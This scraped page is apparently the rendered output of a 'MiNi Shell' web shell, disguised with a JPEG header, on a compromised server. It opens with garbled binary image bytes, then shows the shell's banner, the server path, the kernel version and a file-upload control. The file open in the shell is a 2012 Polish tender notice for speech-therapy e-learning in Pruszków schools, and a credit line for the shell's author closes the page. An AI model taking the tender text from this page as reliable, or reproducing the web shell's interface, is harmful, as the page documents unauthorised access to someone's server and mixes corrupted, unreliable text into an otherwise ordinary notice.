JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120323/91916-N-2012.html

<p class="kh_header"><b>Pruszków: Wykonanie usług edukacyjnych oraz zakup dostępu do internetowej aplikacji na platformie
e-learningowej  umożliwiającej przeprowadzenie indywidualnych i grupowych zajęć logopedycznych
w szkołach pruszkowskich wraz z dostawą wyposażenia, wdrożeniem i świadczeniem usługi serwisowej, a także szkoleniem w ramach projektu
Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy poprzez e-logo</b><br>
<b>Numer ogłoszenia: 91916 - 2012; data zamieszczenia: 23.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Pruszków , ul. Kraszewskiego 14/16, 05-800 Pruszków, woj. mazowieckie, tel. 022 7587244.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pruszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usług edukacyjnych oraz zakup dostępu do internetowej aplikacji na platformie
e-learningowej  umożliwiającej przeprowadzenie indywidualnych i grupowych zajęć logopedycznych
w szkołach pruszkowskich wraz z dostawą wyposażenia, wdrożeniem i świadczeniem usługi serwisowej, a także szkoleniem w ramach projektu
Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy poprzez e-logo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Celem programu jest:

- Objęcie terapią logopedyczną 1450 uczniów z 6 pruszkowskich szkół podstawowych w wieku 7-9 lat.

- Upowszechnienie świadomości logopedycznej i nauczania na odległość oraz zwiększenie o 25 % ilości dzieci w Szkołach Pruszkowskich bez zaburzeń wymowy.

- Dotarcie do środowisk o utrudnionym dostępie do opieki logopedycznej.

- Wsparcie klasycznej terapii logopedycznej przez technologie informacyjne; wyselekcjonowanie dzieci z wadami wymowy; podniesienie świadomości społeczności lokalnej o potrzebie wczesnego wspomagania dzieci.

- Obniżenie kosztów edukacyjnych związanych z dojazdem dzieci do specjalistów oraz zakupu materiałów dydaktycznych; stworzenie właściwych warunków nauki; poprawa wizerunku szkół i ich promocja.



1.2. Zakres prac - Zadanie nr 1

Wykonanie usług edukacyjnych w 6 szkołach podstawowych miasta Pruszkowa przewidzianych w projekcie Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy poprzez e-logo. 

W zakres zadania wchodzą następujące czynności:

- Przeprowadzenie badań przesiewowych grupy 1709 uczniów w wieku 7-9 lat, wraz z przygotowaniem  dokumentacji   kwalifikującej.

- Objęcie terapią logopedyczną grupową 36 grup po 20 uczniów - zajęcia z każdą grupą w wymiarze 
1 godz. lekcyjnej miesięcznie; Łączny wymiar godzin: 36 grup x 1 godz. x 18 m-cy = 648 godz. 

- Utworzenie 120 grup 6-osobowych do e-logo - lekcji; zajęcia z każdą grupą w wymiarze minimum 1 godz. lekcyjna miesięcznie przez okres 18 m-cy.

- Zdalną opiekę logopedyczną z wykorzystaniem dostępu do internetowej aplikacji e-logo-lekcja.
Logopedzi wykorzystują 198 abonamenty do konsultacji uczniów  szkoły  przez okres 18 miesięcy. Logopedzi sami dowolnie decydują,   którym uczniom je przydzielić i na jaki okres. Logopedzi zobowiązani są do poinstruowania rodziców ucznia, jak korzystać z konta licencyjnego w domu, oraz do kontaktu z uczniem nie rzadziej niż raz w tygodniu.

1. Zajęcia będą odbywały się po lub przed obowiązkowymi zajęciami lekcyjnymi według planu pracy zajęć pozalekcyjnych opracowanego przez dyrektorów szkół. 

2. Zajęcia odbywać się będą od poniedziałku do piątku, w godzinach 8:00 - 17:30 na terenie szkół.

3. Za godzinę zajęć należy rozumieć godzinę lekcyjną czyli 45 minut zegarowych.

4. Do obowiązków Wykonawcy należy w szczególności:

a) prowadzenie zajęć dodatkowych w godzinach dostosowanych do wymogów  uczestników i warunków szkoły, po uzgodnieniu z dyrekcją szkoły;

b) stała współpraca z dyrektorem szkoły, w której prowadzone będą zajęcia;

c) prowadzenie zajęć z racjonalnym i efektywnym wykorzystaniem pomocy dydaktycznych, w tym sprzętu komputerowego oraz platformy e-learningowej, zakupionych w ramach realizacji projektu i udostępnionych w okresie świadczenia usługi edukacyjnej;

d) praca przy wykorzystaniu platformy e-learningowej do zdalnej terapii logopedycznej;

e) szkolenie rodziców z wykorzystania platformy e-learningowej  do konsultacji z Logopedą;

f) zapewnienie we własnym zakresie zastępstwa przez inną osobę, posiadającą kwalifikacje określone 
w postępowaniu, w przypadku niemożności osobistej realizacji zajęć.  

g) systematyczne i prawidłowe prowadzenie dokumentacji zajęć, tj. karty czasu pracy, dzienników zajęć grup szkolnych.

h) opracowanie w terminie 7 dni od daty zawarcia umowy  harmonogramu zajęć.

i) przekazanie Zamawiającemu w ciągu 7 dni po zakończeniu realizacji projektu pełnej dokumentacji , do sporządzania której zobligowany jest Wykonawca oraz wszelkiej innej dokumentacji wytworzonej w trakcie realizacji projektu.

j)  prowadzenie dokumentacji projektowej zgodnie z wytycznymi Programu Operacyjnego Kapitał Ludzki Europejskiego Funduszu Społecznego Poddziałanie 9.1.2. oraz przekazywanie Zamawiającemu w terminach określonych w programie.





1.3. Zakres prac -  Zadanie nr 2

Dostęp do internetowej aplikacji na platformie e-learningowej  umożliwiającej przeprowadzenie indywidualnych i grupowych zajęć logopedycznych w szkołach pruszkowskich oraz zakup wyposażenia wraz z wdrożeniem i świadczeniem usługi serwisowej, a także szkoleniem w ramach projektu Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy poprzez e-logo

W zakres zadania wchodzą następujące czynności:

- Dostawa 198 kont licencyjnych na dostęp do aplikacji internetowej na platformie e-learningowej  umożliwiających przeprowadzenie indywidualnych zajęć logopedycznych z zapewnieniem jednoczesnego dostępu na dowolnych stanowiskach pracy uczniów w szkole i domu, podłączonych do Internetu przez okres 18 miesięcy - licencje indywidualne;

- Dostawa 6 kont licencyjnych na dostęp do aplikacji internetowej na platformie e-learnngowej umożliwiających przeprowadzenie grupowych zajęć logopedycznych w szkołach, zapewniających jednoczesny dostęp dla 6 stanowisk szkolnych podłączonych do Internetu na okres 18 miesięcy - licencje grupowe;

- Przeprowadzenie 5-godzinnego szkolenia dla osób realizujących program w zakresie Profilaktyka logopedyczna - praktyczny instruktaż dla nauczycieli

-Dostarczenie niezbędnego doposażenia (wyposażenie multimedialne);

- Uruchomienie, konfiguracja, nadzór techniczny oraz świadczenie usług serwisowych dla sprzętu oraz oprogramowania e-learningowego w szkołach a dla uczniów objętych licencją Wykonawca zapewni usługę tylko w zakresie oprogramowania  przez cały okres realizacji terapii.

- Wykonanie i analiza raportów końcowych wraz z ich oceną przez jednostkę naukową..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 85.14.00.00-2, 48.00.00.00-8, 72.26.30.00-6, 80.53.31.00-0, 30.21.31.00-6, 72.75.32.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca powinien być wpisany do ewidencji publicznych lub niepublicznych placówek doskonalenia nauczycieli.
- Wykonawca powinien być wpisany do rejestru instytucji szkoleniowych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Warunek posiadania wiedzy i doświadczenia będzie uznany za spełniony, jeżeli Wykonawca wykaże się wykonaniem w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - w tym okresie, minimum 2 usług edukacyjnych trwających przez  okres co najmniej 6 miesięcy i pozytywnie zakończonych, których zakres obejmował terapię logopedyczną dla dzieci z zaburzeniami rozwoju mowy z wykorzystaniem narzędzi e - learningowych, potwierdzonych dokumentami o należytym wykonaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie precyzuje w tym zakresie żadnych wymagań których spełniania Wykonawca
zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Warunek dysponowania osobami zdolnymi do wykonania zamówienia, będzie uznany za spełniony jeżeli Wykonawca wykaże się dysponowaniem minimum:

a/ kadrą nauczycielską w liczbie co najmniej 6 osób posiadających uprawnienia do nauczania w klasach I-III i co najmniej stopień nauczyciela kontraktowego  oraz co najmniej 6 logopedów posiadających odpowiednie kwalifikacje oraz doświadczenie.

b/ 1 osobą posiadającą doświadczenie w realizacji i rozliczaniu projektów POKL



c/ 3 osobami - Trenerami obsługi aplikacji - posiadającymi kwalifikacje oraz doświadczenie zawodowe 
w prowadzeniu szkoleń związanych z e - learningiem on-line terapii logopedycznych z zastosowaniem aplikacji internetowych oraz prowadzeniu badań przesiewowych. Wszystkie osoby muszą posiadać wykształcenie wyższe z przygotowaniem pedagogicznym oraz posiadać kwalifikacje do prowadzenia zajęć e - learningu on-line terapii logopedycznych, posiadać minimum 3-letnie doświadczenie pedagogiczne w charakterze nauczyciela oraz wykazać się udziałem w przynajmniej 1 szkoleniu z zastosowania aplikacji internetowych w e - learningu on-line terapii logopedycznej; 

d/ 1 osobą - Specjalistą ds. wsparcia technicznego - posiadającą kwalifikacje oraz doświadczenie zawodowe związane ze wsparciem technicznym użytkowników aplikacji internetowych e - learningu on-line, w tym instalacji i konfiguracji oprogramowania;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie precyzuje w tym zakresie żadnych wymagań których spełniania Wykonawca
zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy (według załączonego druku) 

2) Upoważnienie/pełnomocnictwo do występowania w imieniu Wykonawcy 
UWAGA: dołączone wtedy o ile nie wynika z załączonych dokumentów 

3) Wykaz prac, które Wykonawca zamierza powierzyć podwykonawcom  

4) Szczegółowa specyfikacja techniczna i funkcjonalna oferowanej aplikacji 

5) Opinia o merytorycznej i funkcjonalnej poprawności proponowanego rozwiązania wystawiona przez
uczelnię wyższą lub samodzielnego pracownika naukowego lub inny podmiot będący autorytetem w
zakresie terapii logopedycznej 

6) Odpowiedni dostęp do systemu. Wykonawca  poda login i hasło do wersji demonstracyjnej systemu na
czas związania  ofertą.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmiany umowy.

1) Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w następujących okolicznościach tj.:

a) zmiana warunków i terminu realizacji umowy - zmiany te mogą wystąpić na skutek negatywnych okoliczności mających bezpośredni wpływ na realizację przedmiotu umowy oraz w sytuacji wystąpienia problemów związanych z realizacją założeń projektowych i/lub koniecznością usunięcia błędów lub wprowadzenia korekt w przedmiocie umowy,

b) zmiana warunków płatności - zmiany spowodowane niedotrzymaniem terminów przez strony umowy, zmiany wynikające ze stopnia wykorzystania środków i terminów ich wydatkowania,

c)  zmiany danych Wykonawcy (np. zmiana siedziby, adresu, nazwy),

d) zmiany w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez obie strony,

e)  w przypadku zmian istotnych warunków realizacji projektu dokonanych przez Instytucję Wdrażającą Regionalny Program Operacyjny Kapitał Ludzki.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pruszkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Pruszkowie, Biuro Zamówień Publicznych, pok. 113 /wersja papierowa 15zł./.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2012 godzina 13:00, miejsce: Urząd Miejski w Pruszkowie, pok. 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach Programu Operacyjnego Kapitał Ludzki Europejskiego Funduszu Społecznego, działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszeniu różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com